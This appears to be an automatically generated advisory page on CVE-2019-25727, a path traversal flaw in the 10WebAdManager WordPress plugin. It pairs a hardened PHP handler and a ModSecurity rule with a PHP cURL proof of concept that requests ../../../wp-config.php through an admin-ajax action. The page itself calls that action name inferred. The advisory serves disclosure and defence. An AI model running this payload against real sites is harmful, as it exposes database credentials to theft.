Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : June 13, 2026

CVE-2019-25727: 10WebAdManager <= 1.0.11 Unauthenticated Arbitrary File Download PoC, Patch Analysis & Rule

Plugin: ad-manager-wd
Severity: Medium (CVSS 5.3)
CWE: 22
Vulnerable Version: 1.0.11
Patched Version:
Disclosed: June 4, 2026

Analysis Overview

Atomic Edge analysis of CVE-2019-25727 (metadata-based): This vulnerability affects the 10WebAdManager plugin (slug: ad-manager-wd) for WordPress, version 1.0.11 and earlier. It allows unauthenticated attackers to download arbitrary files from the server via a path traversal attack. The CVSS score is 5.3 (Medium), with a vector indicating network-based, low-complexity exploitation without authentication requirements. The impact is limited to confidentiality (low) with no integrity or availability impact.

The root cause is a path traversal vulnerability (CWE-22: Improper Limitation of a Pathname to a Restricted Directory). Based on Atomic Edge analysis, the likely vulnerable code involves a PHP function that reads a file path from a user-supplied parameter (likely via GET or POST) and passes it directly to file reading functions like file_get_contents(), readfile(), or include() without sanitizing path traversal sequences (e.g., ../). The plugin may use this functionality to serve files like downloads, logs, or cached data. Since no code diff is available, this is inferred from the CWE classification and common WordPress plugin patterns for file download handlers.

Exploitation requires only an HTTP request to a vulnerable endpoint. Atomic Edge research suggests the plugin likely registers an AJAX action, such as ad_manager_wd_download or a similar handler, accessible via /wp-admin/admin-ajax.php with the action parameter set accordingly. The attacker would append path traversal sequences like ../../../wp-config.php to a parameter that specifies the file path. Example: POST to /wp-admin/admin-ajax.php with action=ad_manager_wd_download&file=../../../wp-config.php. Since authentication is not required, any unauthenticated attacker can trigger this.

Remediation requires sanitizing file path inputs. The fix must strip or reject path traversal sequences (../) and validate that the resolved path falls within an allowed directory, such as the plugin’s own upload folder. WordPress functions like wp_normalize_path() and realpath() can help, combined with checks that the base directory matches. Atomic Edge recommends that the plugin explicitly whitelist allowed files or directories rather than relying on blacklisting.
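The following is an added example, not code from the 10WebAdManager plugin or from Atomic Edge. It contrasts the unsanitized resolver pattern the analysis infers with a handler hardened the way the paragraph above recommends: canonicalize with realpath(), require the result to stay under a fixed base directory, and allow-list what may be served instead of searching for "../". The function names, the 'file' parameter, the base directory and the extension list are assumptions; the self-test builds its own files in a temporary directory so it runs stand-alone.

```php
<?php
// Added example (not the plugin's code): a download handler hardened against
// CWE-22, next to the unsanitized pattern described in the analysis.
// All names here (unsafe_resolve, safe_resolve, serve_download, the 'file'
// parameter, the uploads base directory, the extension allow-list) are assumed.
declare(strict_types=1);

// Illustrative unsafe pattern: the request value reaches the filesystem as-is,
// so a value such as "../../../wp-config.php" leaves the intended directory.
function unsafe_resolve(string $baseDir, string $requested): string
{
    return $baseDir . '/' . $requested;
}

/**
 * Resolve a user-supplied name to a file guaranteed to sit inside $baseDir,
 * or return null. realpath() collapses "..", symlinks and duplicate separators,
 * so the containment check is done on the canonical path, not the raw string.
 */
function safe_resolve(string $baseDir, string $requested): ?string
{
    if (strpos($requested, "\0") !== false) {
        return null; // NUL bytes can truncate paths in lower-level APIs
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // base directory itself is missing or unreadable
    }
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($candidate === false || !is_file($candidate)) {
        return null; // nonexistent, or a directory rather than a file
    }
    // Containment: canonical path must begin with canonical base + separator.
    // Because realpath resolved symlinks, a link pointing outside is rejected too.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Allow-list the file types this endpoint exists to serve (assumed list).
    $allowed = ['txt', 'csv', 'json', 'png', 'jpg'];
    $ext = strtolower(pathinfo($candidate, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed, true)) {
        return null;
    }
    return $candidate;
}

// Hardened AJAX-style handler: serves the file or answers 403; the rejected
// path is never echoed back, so the response leaks nothing about the layout.
function serve_download(string $baseDir, array $request): void
{
    $name = (isset($request['file']) && is_string($request['file'])) ? $request['file'] : '';
    $resolved = safe_resolve($baseDir, $name);
    if ($resolved === null) {
        http_response_code(403);
        echo 'Forbidden';
        return;
    }
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . basename($resolved) . '"');
    readfile($resolved);
}

// Self-test on a constructed layout: uploads/report.csv is servable,
// secret.php one level up stands in for a configuration file.
$root = sys_get_temp_dir() . '/ae_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/uploads', 0700, true);
file_put_contents($root . '/uploads/report.csv', "id,clicks\n1,42\n");
file_put_contents($root . '/secret.php', "<?php // stand-in for wp-config.php\n");

$cases = [
    'report.csv'        => true,   // legitimate download
    '../secret.php'     => false,  // traversal out of uploads
    './../secret.php'   => false,  // same, with a leading "./"
    'missing.csv'       => false,  // nonexistent file
    "report.csv\0.php"  => false,  // NUL-byte truncation attempt
];
foreach ($cases as $input => $expectAllowed) {
    $allowed = safe_resolve($root . '/uploads', $input) !== null;
    printf("%-20s -> %s%s\n", addcslashes($input, "\0"),
        $allowed ? 'ALLOWED' : 'BLOCKED',
        $allowed === $expectAllowed ? '' : '  (UNEXPECTED)');
}
// The unsafe resolver, by contrast, simply hands back the escaped path.
echo 'unsafe_resolve: ' . unsafe_resolve($root . '/uploads', '../secret.php') . "\n";

// Clean up the constructed files.
unlink($root . '/uploads/report.csv');
unlink($root . '/secret.php');
rmdir($root . '/uploads');
rmdir($root);
```

The order of checks matters: realpath() runs before the prefix comparison so that "..", "./" and symlinks are already collapsed when containment is tested, and the extension allow-list is applied to the canonical name, not the submitted one. Denying the literal "../" string instead would be fragile, which is why the paragraph above recommends allow-listing.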

Successful exploitation allows an attacker to read sensitive files including wp-config.php (containing database credentials), .htaccess files, logs, and other configuration files. This can lead to full database compromise and potential privilege escalation within the WordPress environment. The absence of authentication increases the risk, as any public visitor can trigger the download.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2019-25727 (metadata-based)
# Blocks unauthenticated path traversal via 10WebAdManager AJAX handler
# REQUEST_FILENAME is the path without the query string, so the match holds
# when admin-ajax.php is called with extra query parameters; the traversal
# pattern escapes the dots so "@rx" matches a literal "../" rather than any
# two characters followed by a slash.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
  "id:201925727,phase:2,deny,status:403,chain,msg:'CVE-2019-25727 via 10WebAdManager AJAX',severity:'CRITICAL',tag:'CVE-2019-25727'"
  SecRule ARGS_POST:action "@streq ad_manager_wd_download" "chain"
    SecRule ARGS_POST:file "@rx \.\./" "t:none"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2019-25727 - 10WebAdManager <= 1.0.11 - Unauthenticated Arbitrary File Download

// Configuration: Set the target WordPress site URL
$target_url = 'http://example.com'; // Change this to the target WordPress URL

// File to download (e.g., wp-config.php for database credentials)
$file_to_download = '../../../wp-config.php';

// The AJAX action used by the vulnerable plugin (inferred from plugin slug and common patterns)
$ajax_action = 'ad_manager_wd_download';

// Build the AJAX endpoint
$endpoint = $target_url . '/wp-admin/admin-ajax.php';

// Initialize cURL
$ch = curl_init();

// Set cURL options for POST request
curl_setopt($ch, CURLOPT_URL, $endpoint);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'action' => $ajax_action,
    'file' => $file_to_download
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Skip SSL verification for testing
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL error: ' . curl_error($ch) . "\n";
} else {
    // Output the response
    echo 'HTTP Status Code: ' . $http_code . "\n\n";
    echo 'Response Content:' . "\n";
    echo $response;
}

// Close cURL session
curl_close($ch);
?>
